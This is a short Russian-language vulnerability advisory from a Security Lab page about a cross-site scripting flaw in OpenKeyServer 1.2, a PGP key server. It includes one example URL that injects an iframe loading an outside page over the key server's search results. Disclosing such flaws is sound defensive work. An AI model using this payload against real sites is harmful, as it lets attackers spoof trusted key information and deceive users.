Security Lab

Cross-site scripting в OKS (OpenKeyServer)

Дата публикации:27.03.2002
Всего просмотров:1498
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

OKS (OpenKeyServer) обеспечивает безопасное хранилище для большого количества отрытых PGP ключей (сотен тысяч).

Уязвимость позволяет нападающим вставлять злонамеренный код в существующие ответы. Уязвимость особенно опасна, когда дело касается сервера ключей, так как сама информация о ключах обычно считается высоконадежной.
Пример:
http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennomatch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20%20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src=http://www.securiteam.com/openkeyservertemp/></iframe>&op=index



Уязвимость найдена в OpenKeyServer version 1.2
 
Ссылки: Источник